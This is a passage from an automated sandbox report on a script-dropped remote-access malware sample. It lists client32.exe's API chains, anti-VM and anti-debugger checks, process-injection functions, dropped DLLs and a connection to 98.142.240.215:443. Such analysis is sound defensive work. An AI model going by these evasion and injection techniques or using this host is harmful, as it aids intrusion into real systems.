                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11024880 _strncpy,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C1020
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11113380 IsIconic,GetTickCount,5_2_11113380
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB750
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB750
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111236E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111236E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_11025A90
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115BAE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115BAE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113FA0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139ED0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11025EE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115BEE0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_110241A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024880
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C6091F04_2_6C6091F0
                                Delayed program exit found
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110B86C0 Sleep,ExitProcess,5_2_110B86C0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle,4_2_1112AF80
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeWindow / User API: threadDelayed 461Jump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeWindow / User API: threadDelayed 396Jump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeWindow / User API: threadDelayed 7777Jump to behavior
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\4dvs23l\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\4dvs23l\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\4dvs23l\temp\ie_to_edge_bho_64.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\4dvs23l\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-79491
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-81895
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-80625
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-81274
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-83831
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decisiongraph_4-83832
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvaded block: after key decision
                                Source: C:\ProgramData\4dvs23l\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\ProgramData\4dvs23l\client32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-84356
                                Source: C:\ProgramData\4dvs23l\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-80006
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI coverage: 6.0 %
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI coverage: 2.8 %
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C6091F04_2_6C6091F0
                                Source: C:\ProgramData\4dvs23l\client32.exe TID: 4852Thread sleep time: -46100s >= -30000sJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exe TID: 5808Thread sleep time: -99000s >= -30000sJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exe TID: 5808Thread sleep time: -1944250s >= -30000sJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\ProgramData\4dvs23l\client32.exeLast function: Thread delayed
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_6C613130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C613226h4_2_6C613130
                                Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,4_2_110BD520
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,4_2_1110F910
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1110BD70 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111273E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110BD70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_110663B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106ABD0
                                Source: client32.exeBinary or memory string: VMware
                                Source: wscript.exe, 00000000.00000003.1995143786.000001AC3DF7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: client32.exeBinary or memory string: VMWare
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-81730
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-79982
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\ProgramData\4dvs23l\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1103179F SetUnhandledExceptionFilter,4_2_1103179F
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_110934A0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_11031780
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11162BB7
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116EC49

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\wscript.exeFile created: remcmdstub.exe.0.drJump to dropped file
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 98.142.240.215 443Jump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\4dvs23l\client32.exe "C:\ProgramData\4dvs23l\client32.exe" Jump to behavior
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
                                Source: client32.exeBinary or memory string: Shell_TrayWnd
                                Source: client32.exeBinary or memory string: Progman
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoA,4_2_1116C24E
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _LcidFromHexString,GetLocaleInfoA,4_2_11174796
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6C63DC56
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6C631CC1
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoA,4_2_6C63DC99
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6C631DB6
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6C631E5D
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6C631EB8
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11174BCC
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoA,5_2_1116C24E
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11174796
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_111746A1
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_1117483D
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11174898
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11174B29
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11174B90
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11174A69
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\4dvs23l.zip VolumeInformationJump to behavior
